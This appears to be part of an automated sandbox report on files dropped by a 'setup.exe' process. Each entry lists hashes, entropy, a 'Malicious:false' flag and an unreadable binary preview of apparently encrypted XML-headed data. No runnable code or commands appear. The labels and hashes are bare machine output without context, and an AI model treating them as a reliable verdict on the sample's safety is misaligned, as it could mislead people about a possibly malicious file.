              SHA-512:7A3D122BE87F3F33AC08616146086B981278A7BD1379DCEC7A4156070BE95F7E5A3C90B5CB76719AB461436AE6E86317DC04944FD1B6A235037FFAB1861EABE3
              Malicious:false
              Preview:<?xml...................y...]2.Y-"d..y.Z..K+.x..=;z..<E....J.60).|...........\6/W.....uf.......c.1."../.{aVF....\...r...[.,..Uc..a.......=Z...0tY"Tq..W?.3..Mox@hZ.<...o.l/S..el....j..sa>...:..Q..oC0e..sB.X6...a.gZ7.........&!.o.L.qW*.A{..o.H..........[...YU*0.<F. ..M~...........P.~....k.....;....H.Q..#.b...14..4T?.o-.."z[..x7....]..@..l.w../...qX.Ki\N.E.{.7.O..u.?qC.C(..5.......D....W.......Z....=.5._.......;.FL..W.2J.s\.l..6.....KDq"..y.y.<.)b...+....|..Wf....[WDS*$.D.A.&.. ..c.Q=1......~...r...NpGAt.Dy0.j......-*c.DE......C..+...`...L.....7.........&Q. ....W..t.C.w8pR..M.).<.....j...I.......*....4..>...d&-..CJ.q.-..f.4.+...z..i........AnD.TAR#,...]t....fm.A4r..o.!x.........]._......0.......<......l..I:.e......3.I..a.IT.....{....|.;......i.r.+7......$s.....k.]....|7.Z.:....?...Z!.b..`.b...7.i.%./".N.....]!mp..;#.%....X.}Bh4.....:1c...A.$2U.i ....g;=...@..N0..2...k.L.T.T........K...<^...c...s...(ebP..z)3.1.t.].H3.P..A...F~.[_.^7x...R
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):878
              Entropy (8bit):7.777781113260597
              Encrypted:false
              SSDEEP:12:UJbCUrUjWIysA1sWtak+46mYz+Ao2ZQ9e7RYeKUchnxjk1lFcMsriAJsMR2cii9a:OMQQb46m+fNbKUctxQ6+FbD
              MD5:7C40F202FBB4FD2F8222AADCB89A7163
              SHA1:631FB0AE639BD76F54583BCD355D2E494D847D37
              SHA-256:4399CF83C4EC922AFD66FD487ACFB20E10529974DC92C2AB344E4CDB3CB80B3C
              SHA-512:E9F272AFF0AE788A9FA763C3B4E4CCCD57AB18D3A6138EA3B215E63BEB0859CDE9F7DD74652D587A392DA16BFDA0402B6C36748B04123B7CC90DBB28FECC0E46
              Malicious:false
              Preview:<?xml./..r........b..!.xR..t......*..a|PZ....:.zS.gH..(mO....O..Z~.hK.9......a...!O...B..5M..\.$.q..qc..l.....749..[.:..I...1jU..7.I...`.<l.M.X,b...U...k{..yj..:-.1..Z...@.=......(,QbD.2..p.0.._.[.&..s..Z..":....;...F..t.-..w.1...i+..5Z..*.4..a|..2.K..aY..._.J+..s.q.i2......].P.q......1.:....|#....8....X..X4. 4M.:.....7...R.......P.a9BI@..wy..1..j......G5D.....mN`l.{.1................F...\.(e2..`bi...R.!YpmX...eS.K`Q..e..v.....`./....h..f..t./...C.Y..!........x..f.z..S}.I.r.^.8.U. .....+@j7._F..hu{...O/...&.,.....&.mA.5K..u.........,.M....^.....d.'..F&.f_.,C..e....ns.{0{[..oR..L...WL..8.h.LlL.>.,.....I.H./..t?@f....r..t....(t^...2......ch.q...w.....'^...5NE....%;..).....d9".-...YS.=....r.:g....5...Wu..3...?D.H...'.9..1B..gV..RJ....K%.i^..E.J...G.}eVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):726
              Entropy (8bit):7.67155994258009
              Encrypted:false
              SSDEEP:12:LuE7QcsuuHpNSTolsZE1IfrqcmgKVa51WxCR80PM33K4dayDMU1ate9A9Pbi+7Ju:LB7QqujS0xgKVswxC+0P23jdaeMyF+P2
              MD5:C5A71A8443A52EF33BFA9013275FC327
              SHA1:033B241A3258CE6A03EEE271FF66A677006315A7
              SHA-256:4C5329DA41F367EF86108748D98DE477B30DBAD1BF60BF79749B59AF8A8AE570
              SHA-512:593241D24E72252611757B42FFF6167693D661A5B5AC68DAD39AC6B1EF7F8FB7E76ECBB633F28266A4CB30861BBD7DA7C9174F20C8DEF41B9AC29C4FA6FB03F6
              Malicious:false
              Preview:<?xml.........W..#...Z...M.4D}...$.h..V..s..Jv....o.T.b.......=../H`.I.H.[..\.@.......c.......Z..:...c.j4$.YVf~.e/..o.~-#...H(..\x.0..#....D..7..s.e.-|...d.=p...|0...v....2..u]...z.[N.`.......2..Jy.a.7.....'.O.w......`..Dx.,.B...jR.j.u.@.....g..n..X_...(8A....5.n".8.........G?.K..`.K3....p/).cs..,...2HQU......9..Ui.E.vFH.a..m.J.....64...PZJ-.7......c.....es.....$........>.c..).J-.m....u'.....Z...w1.W.HO....(.o..i.R4.*r.sT2.(.Q=."..$7....7.m.H......Q....PsB6Y..a...V.Yy.w..y..{...."8|?..!.....h..=K..ND..8......?..#g....(.0..o....D{.&_...9aI...J..)t~_qI..`.+.V.e#@BsH..p%.H..C..%1..E=.H].q..A.z:...7=.;8.H../.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1685
              Entropy (8bit):7.872424357944722
              Encrypted:false
              SSDEEP:48:plyv0eNnFXwgRcj7pJoj99yyseYqjBpecnaRyxCD:LyvPFViI9yHexFpelR1
              MD5:1187F3D0B0AEC997A6F4C0FD76C4E1BD
              SHA1:78974FE9C1A8BAFF2A2C5AB9450E5FD3A56D3761
              SHA-256:E1259E0EEF4C5B537B92CA18A483431EEAA7AE0A75E079449FD0A080510F34CF
              SHA-512:7DA5313AD109BE10A41BA1F6C7FB3C7A4660BF88A59906331725A5BB905D000F19DDDDAA00119F47BFE7501402BDE0EEF9C5CAACC2CBB3B72E0A8FD09C81D03B
              Malicious:false
              Preview:<?xml.S......m(..v.;e..p....yGM....e$....>.N.x...R......."x...@.n=.3hO.AA.5..<.Q.......Wk..[t^..c0.....gQO..].^..dc.......\....T......R...6.L"r*.....I..38i0..#.2.....,..1.6_.;.G.....H,.?R..l......G.M.r$S.2DS/...!yd...S...7.(....sf..`...QO.0..u*.....j.q.+Cy.5...1.....$.h..f.....6U.-;..'o.\......o.. ...D.e..1.13i.....5$.. sg9...NP.>..~a....30.J.jte..uSV4n.,...F..m..PVw.nA3...qPR2.O...#...{D....1...D.m.:>..|......P#.f-lE<..>.....^-t.F3kB.g.#.^'......\..U|..w.].WfaG.W..G......<a.@............_&dX`..}.pY..U...T.7d..2..G,....P.a..y.U...m......H!..).l.?\.}..w.....=...(.Q.N.z.. W..e-...5.._..p..>..G._.v3T&..{.Q7...m..B..k..Lb....W.d.^.N..Q....P..b...O.s.....xz........{.."Z...av..wv<...ehc....A......i.."SP...pF...Bv.r.=..In.m....lk3...v..|=.O..F...m3..5;.x|.f..Y).6s....~...|C.....]..c;.`.,|..H...g...f.1.R5..k...0.i....<R...(..bRiNa.Y!..F.....).].}......K.....c.^r....N...-Ln.2...?d.eZ.1..~.tP.94........r...FJ...Z'..........E2,D..N...=.... Uq..|.l4
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1722
              Entropy (8bit):7.871164293982923
              Encrypted:false
              SSDEEP:48:Hf9uwU0aJURfo/2WRfi7VgiCO/UiW6I+5D:Hf9LU0aqfvEi7i6Ik
              MD5:8420CA592688852BF8EA098BF15ED60E
              SHA1:9ABB6FDD31127CEF816E5F2325AD5088F9AA5B4F
              SHA-256:1F28D036B3FDF38B058E115077A7F99BCBB59791AA79A4E4AAFDDCFD96D33E58
              SHA-512:C5037B465AE744632215F3E9385C8627D506DD0B76FAE48B60F125BA2AD1D8A21B8E9FF66581A4C1DEB1038F3845409E095733940A18842D4C9C5C79D93DDA2B
              Malicious:false
              Preview:<?xml..F......4-....*.....o.....v.r.2IH.Z9!..;z9..H,....BP......(...%...g..cR;.D.!.Ud..>.A.Q@..@...6..u...@..~.....C....cZ........MH.#.?..&s.._Upw...D.m'[mg...9.n.u..*.Xt...H..'.6\QeY.0.b.....Q/.V.o...e.N..G...S..@.W.5......9...c;x.....OW...w..2.....9a....^,.M....);u.. &.....X.../Ei..b.R.p...>.w.v#.E.]/&.H......r.s...P.....v..%.u...B.YF9.3.k.X.f...O(.y.H..Gu...5.g.........H!Kv...>"R.Yl...2B5....>...o.{K....c.>...#...3.\..6....t..tM...\.F[...9`.3..q2.;.b.)oh/.9.o..+e.d..s.[.o..xH~.y.OAl...l<)d..D57?..s...m...AB..P..aRS.'..C...>d"......J.Hi....5l.o.....@.3)...+....f...9.'...d8...7r...p1..|;D....*.F..&i.rD..w..9.(.O.9.L.=.O...Uw!#7=v*.......5.!....o..{..T.S....4.R.TJr..g./....Z+..g.n..e.r.[f'.*gB..7,....7$Q...9.....S....TVK..D....K.K..sl.P.T...2.T.j{.n..t[.O.-.m..+.....k...K.-Q.?.-.;5.nf...R./d....QC\6.+ ..".m95N..T...S...I...."N.v._l..5.E...v......A........V....:.-..9........bM.1.....P.... .7.$y?....z.F[.....[..q.2k.|B<r,.tcF....6.aj21G..@.@....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):764
              Entropy (8bit):7.743554400167483
              Encrypted:false
              SSDEEP:12:wbsEYCLImaVoYDBfCSuVJRD87RMSYG+ScGlILTqvkl9YhL7qMf1oFICoCsMR2ciD:wblUHqcBGUMSP+wlI8k3YhL7foFPSbD
              MD5:7C5F275C3E652B9970BC8A3DD527DD4F
              SHA1:D37208E6A6E220658D044D6FF9F139B5331F5B05
              SHA-256:50CDC6E064A3C3A4C6568DD9C8F65C6C2EDE0104557A847922E4F87236B16877
              SHA-512:875B183AE101E3667792B1313CDF5ACA39E0A89B1EFAF5F139DEDA9F3B1696436D4806299EAD1A640187EBED4354145F361012015F6DB4BFE859B97C2EA4D625
              Malicious:false
              Preview:<?xmlM.M?)G...h.k..@...g..l.l...J./...z.[...1.#....x.8.6...z......6...):"......[....?..._..3F.......Y..$.p..W.R..Lvo.J..sU.......8 .c...@.>.V....W....\.>............,.Y....1...W.......Yis..S..q(..C^.>Y...............Jd..7*vW.N.%.2..YOUW........-..[L#.n.2%}.....+9I."Q.5......^@..\.V.?9..k..h|......5Q7...8.....m]UQm..Bu%.+......X..}...'.q..u..<E.f...}1.....mok}..G..u..P....6b|(.?4I...7RS.z........q.....Z(..^U.>[i....&....P09...O..k.YV..gV 4..1{.t...LOk...H.).1..P.w(....o......\.vo.f....n.......8l......;.?..g.F{f.`.).=.]M...-.((.....3..... .....W..Y.0.9.....d.8......k.....\.%@.*d......Qa.?:...........K|._.C..n.}....!..f.e..w.g...{#...SVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.907415542236171
              Encrypted:false
              SSDEEP:48:sN9BLOOgn1PP0Ib8WqTkmItNnOCMfaGstD:Si10Ib8WqCttOhfaVV
              MD5:06BA540A687D5627AC4D926FC73AD80B
              SHA1:124503BAD5969D3F2CCD51B21433CE79B49F867C
              SHA-256:06C8E3FF75623CEB952CEF8EBB1AB07824B8E9095229B45F1ED0F0DDD071F16A
              SHA-512:8A40CB8B6B3ED450AF1012C206CE1980EB22E0BB87BE6A235C6B4A28902187CD4C77C0F2FFCEF82329CDE02C6DD8641B232C7EF39D40AE66CF74B411E8D71D81
              Malicious:false
              Preview:<?xml.......d-.3'...lL.y:ng..5..........~c|........g.....f./-.T...[.t..J.$..9..ZW.0..g...b>x..g....\$2C..'.........2..B....Q....U.z...e$,.Y..%...O..>.V..&...e.f......3...Gg.c..?...f.4W=}#z.....2(..L9..E.......f7..`.=.j.T.W..d..:V..=.3.".l..2d?.-...#1D^..w.........N...~F..P....Ok......U..w...Y.a:....p..:].t.b..;...r......3'K^..r......"..|r..%G..`.A.....N...n....M..O&/JZ .$ X~.m.D.4~5L.h..-.^*..`L.6.S..l.......I.U.npG...(...Ut..es..I.... .P.w..\88...?..y.>....6..}...t.........,...!z...w..j.5~=.....1...&.Rd.F.d7.00.=. e.j.mJ...]O.,X...-...4.UP..B.L.h..D48.J.o.8E.1.bx.pJ....U....j......g<0....u....S.....X.T...E....O..d. ..!.p.f`.7.!.....).U.{..o....IwZ.j:..KF....b....x.$U.h...'..8n....(..z....?..o.`...{J`^#eJ../..R.g..\.XA|.4....`C:.7....>.C....8..OZ...p....a.....5 -.v_P....9hAV.Bl....Dz.]+..gB....8.@'C...n^...........G8..cP......M..0...khv....u+.J4....P...V..M.).p..$.(H.p.5M!X.hG....=$z..[.lNx.o1..^.4...(<....!{.......d.....1...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.889864767317943
              Encrypted:false
              SSDEEP:48:3JavH6A7F3n1aRQVMfsqdmr9VzRMIXyhei3GrUVD:ZavaGF3n1oMYV89dRzXy4QGwt
              MD5:2D3BBDF408EB6643FEAFF8D180396F96
              SHA1:0E6C034CA7972FF0A8D07FEEF1F0D6E28D828006
              SHA-256:F2C1E9898AFC942C2FB64B35AA2C2F25B449D29F726E4E24C623AE5813FA36A5
              SHA-512:2A24B7EB33283F7F41386EB7DAD2E73537CD855E36C335B1301C953A7CE309DF94A21CADE6537FF63A042A842C2A6A51C7DD207A0B1308587A384BDD00E25C8E
              Malicious:false
              Preview:<?xml(. .....iNB.......2.pm{.>*..r.(..8..K..n~.Wy.".-6..`.Y...u.|..*.c..j&.b.....;.7......Rz^....9.[..v7n#.C.........2F.B.*h..KF....J.....^..M...~UT.ARr^Qt...nY3)h.....{........^.F...Jxhn6.Y`D....p.lE....N...<. J(Bi..s.......[7L;..Q..1.F~.....h..$Q..W..N.....P...&.\..==Y..j...9..1.....'.Z*........@.....&eP...3...H...H$m../z.-..,.a..'....$.......]][....Ut...8...%.....9...:....z.M.u.Q.LU.ov.../..8).C0...[.H.)...$}.j....*9|.........,.{..q.{.x.+-.kw3K.V..7,.....M.#e.R......:TL'.5R..,.*...1......0.U.].(..R..I+.........,IUp.c!K..q...5Rk..........86..k..T..!..i.>.^AC...9h[......0.m............[v..v.....>........$?...f.....x0...+OInR....zf7...Ts...A.Q...X.?.Q~r!...@[...*...$.Na.r...d+.....T.hA..g.s.eb.A".x..;.ojs....+....m.%.{...X8.Cb_...3lm....?....)..U.61".R..l|oWc.].7<.....Zwz..U..)9.x..t.<.q...DD...L..d7gzL6....J.m.!...i...QVK..i...]..7.%p.I...H..8mT".Z2Z..E:..4AM5w=..B`...M/EJ....I_\..,^w2..'.#=v...#...("..A.|..q]5.H..N......x..........0.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.903597333458117
              Encrypted:false
              SSDEEP:48:XT5JE5qP2C3F2Mh5GXyEA+uhk3unpziCD:XTs053YMh5GXyEA+ua3unpOK
              MD5:248F22ECF66612E3A349BBA34BCFF06A
              SHA1:F79E3D0DB1BA8100489B3947E095F9C360160D59
              SHA-256:C2CB1EE76C30027CDB05F84128BCDD0FD7F25181C20D37C0AF6042FAA8EFAA8D
              SHA-512:2B7F34F12FCCC9FCC71998AFF7E40DD3A4BD9336E2FF62407235172509101BEF964AD7B6ACEC4661ED33B972C968890215E173344963D08667C94B39756EB10D
              Malicious:false
              Preview:<?xml{.)....yU..z.x..D2..w...3.Uw....l36h..Z..Y2._..g..........j..r......,..+(.y..NL..l.. .w.....V...N.c.......E.3..XuN..9A.......&....^.......G.....W......Ir.D.T...B>..b...`E8....1..Q2.).............8.......UQwb'.}.-1.4....w.....yqlj...d^;.~.U.h8..6=........^--.......|.1......d.....!&..k.mO1...^....j.X.`t....2........d.Dh=.U.'R...p..$..U.R..?.|.O5...+y......hDE...yr.u....-S.j.\U...P!JM..y..A...."..z.t..._..HS...<.vA.O.v....d..c}.......6+!&.0....f....X...U..F\v..`.g[.y8V.`..;.,F.Os..F<,%.Ou.I}.x...u'..W.W../....dp~..L'..... #C.....v.....i..;..]]D...Y;5d$..1|......4...st.Nv^.e..U.*@p......T.../...@..(..q..../-..~......7....@.....s.8I..+..._Nd.0.\...c..fxJ.Nh..!.i.C...L..t(...q.p...wb.....3&.;.e.=Z.'By.....|lt.L.j..1{a..S....?....0",.......eRI..'N...O....Vsy....UW.B.j...{_. {.t...-.A..x.5O......lW...K...v..X...........*.Y..`.n...*...f..E|.)..*.5].t.........].....$..G.KwG(..@.Y.O.dV...L...N.z.n....gx.J.x**.....Q*..X.W.s>(...=.ih_..7
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.89024590414268
              Encrypted:false
              SSDEEP:48:zMdZiv2uMtK/c+B1MR1O9xGYg5E/NLbiCCn5JvD:z8ZiuuMti7B1MRE9xGYg5Adiv51
              MD5:A5DF6414C68125D31DC24B6BAFBB8C03
              SHA1:01EE06B13D6911A3D3D5365301A8CACC91DDA3F5
              SHA-256:1C5471132BE1E6A53E280281C89D805B007A1542663F3D1C2E7D034867B141D9
              SHA-512:CB9CD2DBEDED59485657FDA12E1B4D3F55FCFDC764F55C6978BFDF9AE7E5350FC64D85D19500ED7A6E48E73400087F346707AFF83DA147C0667C7EF94CD40AD1
              Malicious:false
              Preview:<?xml..2.....K...J....>..............j2..V5.6..`.(1 .6...J.Y........& .).....5v.)U..PD....0..[{>sgy..d.XZ.W.L.#FN..N.1.#y..N.I|bu.... x.I%.....F...`h..G.*R...cQ.'.E...x......|.$p...uw%.....K8:..@[7._.<:.(~.....U..W'.,=.*._.Y.u.x.+.a>$5...d!...].uA.^.p...-./....f.5....@.....#..N...w....-...........5....TiH\.;.8..v...$.....]T....P.'..+..........$..<.......gy.U......Q...e1......+/X....iEVRL.0a.^2J._k.....u.joS.9.o....@....v.caa.u..\..{$..Y................&..*n.M...QF.z.K(...s..Im_,...q.V..8_.H...$x|h.....X.....v.....~.V...hH.r_R7._.ss.3.N.W..)j..N.g).X....!.V..`../.H'..p'.......:.V...O.s......T...y....#.....t.A..!....6....$..z.L^.1...........Iz..:...i....OvY......Z* y._..Z.$......8R.[h..'.|....x..........w.]b8o...m...Q.."e.^.L.d|...IbH..A..Q+{.....U..` V.Y.kP.>dA.#&..I.U.<.~iN.......,.....[.?s.$..[..?.....w..,..c.'..V....v.M.....0.."..Y(...l..4.?.....t......HL..i}...~..L"k...`in...E'.%..z..l.H.Hv$.k C.?,.a...C......,.,8p...1....P.A~.s...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.8831975709775906
              Encrypted:false
              SSDEEP:48:KO6lnr6NqITOgj3wE4tztm1wEdn3qLRLcTrKp6bvD:R6lnrUHwEqcHdnsRRc
              MD5:138A66914D90BA1ED82796EAB7873105
              SHA1:B85B9F13F37CEE2E5774F65FD37CDF5072A46D50
              SHA-256:9F5D6B1A628323626854B912909A79CB0B295004C691AA9ECCB5F0F8942FC655
              SHA-512:508D6D02475E9E4D73FD78A67C17CA21A5A2B1FACCD33997FFA3AB96816B72E76F095C86D8A0093D66A0B61CAC269E42429D9082C488918E42A576E21E1E3800
              Malicious:false
              Preview:<?xml.....sA....z-4.DFIe...?....e|G5..i6.....!Y....4.$.x.>...e...*.........%.\....5...'..-.-....}..G.ds..[.,do......$^...._Y,.....>..%......P.<.\ !._:;.1.oG`t.b.....oX$..@^t..cVq"C.Vq...$......u.'}..7.llG.p1.HM,.(.3..o`..t...c.O..u...WtS....|K.)N..T.g.z>...m..a.< ..b/m......t...MD....{..Xc!.'.9.32y,..w.....o.i...."....f.?..)p.D?.......2...ge.f..$f...{R...T.....t(.\I.AG.w.5.\.'..5.,..]bv5!-......J%.k...'..n..<..t..(....V.....W..........2....G....q,.$Z*....J_b.7......^.^0.,..o^UW..k.S... !DWO'.z...N.K@.RL.QC.......|..J-.....5.1>m_....wZW.B.8..s.N...s.i!.-,[8y........]wh.....v...kv.wEf...1..W.......T.\.KP.2..O...|....M...x.|nC.T.4/+.Um..=.#....sq..`...P.Q43..y.........[.g.....wH{.f99..W..z...j.j.....C...<.#..d..+..........v}..j.-V9..M.G.V....h.g.X.)....i..w.....iEp....Q..l..I#!.....Z...C>..c..Pe...,r.VG,..S...@KK..`.._ixU.^V.:F,.......1..]..uh..sdS0..JE..r{yak.D......f^......I...g...'...1......./.d.u..b..0.FRd.6.*....3HP$.g...>u.....6..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.88202234272465
              Encrypted:false
              SSDEEP:48:XPUDXyF5cvKF30cjvMK/XrfiI7vTWc+9k6ID:CXyr8KFkcbewbp+mh
              MD5:AC2291E5DE8E8361A8895DBD8E22703C
              SHA1:A1B97636DA3D297328985BB8D395915012B94D3D
              SHA-256:819FB247263E05F51E4CC063986B3F44A24DCF23A7AE7210BBA33B1A7FB4AB2D
              SHA-512:CE4465757EB8EE0101D799CE272D65178B3336264266EF00E8E795C55E8C289B5D6CA7397E5B685B44526A751C8D385550C87CDE2A28E14D276D8A2D8CBA7F72
              Malicious:false
              Preview:<?xml%v... ....q....CY.........w....n.#..vL&.e.>..h....'.&w..H..>..L........`....E.!.kV......+.......G..Q..K...m*..GGFQ{..K ....i...Q.+... ..G........&....[..o....{....&<..D...O.$.........B.j..&......ip[..s.a...{.Lu.]U*p<p..oLh.M..q.C.w..S....m...{.......e....K.2^..+......"w....?....7.8N^_.....g!.*.'Y..d......|..@..g...6.3.g9.....@.x...FY.dyu.jO...C...M[..B.m)<4.Q..5R....!,..nTr.K.s....8...#V%f.N.wT...a6. .F|M...4..f?fK.....%*....3A_..L..V..1............P...l......l.Qe..?.ur".Mu..j.....I.F..'w\Q...Z.....$......./.*]-...:..I...,.z..e..Zg1qb.b^m##....VR-...z..t...%+.d....k.(txx....,.....n..l.V....h.....=.5=.*.O..p.....7d..FN.,..(....}W.;=....B......b.D|cXj.u.b...P ...m......;.i..|'..........U..3.....<.o7...*...F".D.y.{ha........za............k...1.V.@.O.nl......5.i...r..B...2..VD.5.q....|..-..8.............RC..W..A.{..M.....i....r....0..&..=L.`..2...._u....L@....X-....KzV. ...}..$>Xl..'..e6.=sa.(.Z...P+..F..^.?]....@.m...VT..$#.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.880319471465027
              Encrypted:false
              SSDEEP:24:NhRZiEdRS9AZM2CBAzdKnge4CCVrvVuy4hKkwwBblIVKzOplZmv81ofUdWbD:dZnDZtCBAzdKgTCChV2h/DLsV12D
              MD5:C6D9A45A0EF70CFA58CEC407E435C3A7
              SHA1:9BA28DC358B5A8380F858E0DAD11C49BC7A7F922
              SHA-256:0D053402280BB83203F319ADA6ABC05F5C9A0D4387FAF34743EC3E4F9C018FAB
              SHA-512:98329ABD1FC7B618A735EC9D642DD1CE20CD8A25095C402EC47F389F748A935F63DEDFE181DFD3041E1651D27DD2335C92173CCFAB15A48EB86BD3854C79FF81
              Malicious:false
              Preview:<?xml....$.$...F.."......|.c.mB./..AR...K.&.r......,^dJx..yS,..\._......I4..|S}.nw...p~.;W.{....H.MA.[.....:.KIu..C.\.p....H.XIx.+....(....Yx.A......Q.?:..>o....d...{...Y..GDbr@C\.P0N.Xo..7...m..6.a.?...)..F#~.L....{...`...KwVz..a..z...`4..e..A...*......#..GR.J...(..eG.....w...H....4I$i..iB..9.9.6..[-.u..$..b..S..UC..5..{......zV.B9.......p..r?.........dS6I...8.ku.....9X....m,:..kB.a....O....K.A.j.$g.R.!.(.B..?C.7/....24.K...........'1X.D. .J....M.....2..R.Z.'L#.#...%a.}.o..W7:.]./../....x..|5`.hB......&...<>......wC........S.].e..X...%..w"........a....6V..=.....6..p..4.f.../...L.K6...W..y........GG.y,.|.(}i...P...)..........Z.y.c...M.:.w.w.n...h3..._.../.N.: 6._.Y.G...$.P.j.......-.;.|.~...S.9.!......t....G.3........)..KQ[.7..?@U.....^.HO.A.;....4m,....k..i..g..~T'...f..JU.$7......|F.~).......0+K.F.r;`).)[.`.*..C.;.....e.<.!.V..O...,d..=e.;...J.nJ..&Y.z.'..Iu..!..y...c..$AN..rB.H.....;^.U`.....I.1...|..HN<..%.._.U.....s<...,.X......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.873996840615213
              Encrypted:false
              SSDEEP:48:lC3yh7epIBpNonsWzq0dxDEloosUU+4l843d9ED:y4epIBpu7zbDEsH+4O43d9Q
              MD5:665A17BA2A1E3793D94421A9899BA868
              SHA1:174C6377BFCC4392A4741CBC11A09BEFC69C3D0F
              SHA-256:014DB817F167DE6F0120DB3230ED3DDA7D149CABBFBB2144CB3000A58EAE73F1
              SHA-512:AEB33C66F3AE00C9AB26162AD367A906992D36FC3CFE13A82C4782A6E48D619A0F4D1F9073FC35B9DB276A64D64227446002000DB9726E9DFC8613A5D6B0D62A
              Malicious:false
              Preview:<?xml.<....7..A".X9o.v.......q..ajI....t_.^.....R./<..+.Q.J..9+.}..P..v....6q..w..E..@(...........O...H..w%...4.6=...../..R...XG..Gv..P...v..~..S...^l...../U.x.e...r..[].`....%...$.:...U._...."#...<]J..~.....l.Z.CM._...A......Y.4.......?.*.L....5.r0.b.]....W]V.....-v."5..P.6.R9^.>[........kIc.......~Y0...J9%.-N...R..^.N_z..v..;..T.L!.".N.-....{/l..Z.(wC...!.wU.*8.Y...gk6....De..,..J#Gd.<.NMx..RW...4..H@Y...m;.........Y-.x...zs....N..6.v..y.m..*w..)n.P.S...'r.m.4s.g....^....OA.H..l..B.oR...P1v{.a. .>Q.%I.....D.;....L.=8. ....y....RU..yR.P!...d....m.F.!c..$......G.Q..X{...S.-UR7..Jp$...*.....Q...m.%+g..4.U..g\.......y}.fD..\F.....B.R..q....b..>.!...'.5...t.3.]w...v.C.4..q)...]......:.......<B..^.....u..I....0.A.. V..\kK...1.j.a+.....D.b...P.....l..i.*...f..........p...\.o.....H.'Np.......,.......9I..(....[W.[.2l.h...l..Mb.m..QJT..........-..a>O1...Z./.._t,'#..0U...)...Ghg..V!}1A....-.'.%O.2..X..A.L...d#...@t..^.K..}M.../R..W.P.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3225
              Entropy (8bit):7.93775309469754
              Encrypted:false
              SSDEEP:48:TxMZ+lNSWZ4gKYYVcovZnK3+DvQvucxfUcIRf3kAa3Z8vMD:TdNPEFVcoI3qvvld3kA3o
              MD5:BA3DAF7AAB474CA3461B8C40AA72B46A
              SHA1:753A49A57762893925E62EC67932FFFB039FC6A5
              SHA-256:FC17F1ECE7BB3ACC54F881DDC042B10AB183C2ACC36CFE96FF161DC1FC0EE996
              SHA-512:368790760DCE1E1C094D5531D25977629C0BD75D24A23EDF8CAF7584CF5CEE7D7CAB4BA82BE0C75AA44C68614340F4611C588AE706FFBD1199FF72C8FFC7683D
              Malicious:false
              Preview:<?xml..k....;..V......E..S.,ty6>.&z...VY.D.^`..c.........x...g..a..E.....9.,..{. ..].P]XZ.h.._..,.w.. ...R."#...v....[J....F7..........o....R....,....+4.2@..a..:..%.0~f-.x..1...Lb.al...}D..9...<.%.?.v..+.Q/..:.{.......Z.....f.cSy^wC1m.vvdKvv:.-.Fzv^[..7.yB......W?......f.J5.p.+.oz.D.....C6.M4.*...B#$......d...K1..^..{W.F.].<.........(.?O..Z.h|...f.%z.[.#\.B...0..B.....u6.jH.OL".c.&.djX2.9..Ry.sOI./c.._.$...f....n...E.!c..KRA...P......P...y.CU..&..S...l.m=.Y..../.....D]...'.......B...dO..@.Q.m.3.......ux...G_.[B8tj...yU% ..5.#.r.].2.$N.@..>..3..{LH..W.d........@.P..z%.V..5^R.q(........m|\....8.....+......C.....WX.....^6.uz...7.t...F...`1.|B.:.F.l>......1.E.er+/Q2......N...;.].w.Le....SBA..$.g.*.W....'...\......e/..8f]T....4Bq.....5..5....k..p..+}.....rc["y.<...=.$~..3.....q..O..../$.!.W..Tp...N.9......v...s....(...Q...a.w.6.2..i.`....m..,.l...6...z..3...f.W...}.&.G...&..B.E...>4.@.:.rC.M.....9.Qh>.6oZ.]>A.b......a...E}.O..........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):851
              Entropy (8bit):7.751374120707582
              Encrypted:false
              SSDEEP:12:EEKWuDgnPqqgDdjL4dtER31gui9pbxsSdC58kXM1KF6nwKpKdNwha5Fl61Bt+msV:5hCFSE8uEamPkc1KF6wKsaarl6TsbD
              MD5:B11336AEC9507D59E4CC979E5357A643
              SHA1:AA56172A3858D9A6DC095B8CD5CE26059ED0C482
              SHA-256:557DF5AB12B37C1C995340A802ED1FA40827F9CC1B8334BEF19CB059731CA307
              SHA-512:B58AA67287A7EC49A59ED08AF0CD4D917A2FE8FDBA23012FF0570404539D6BF0D927B1BF687DD86E9C0A173C0DB3291D3D1CF628352E929214A17748C990C761
              Malicious:false
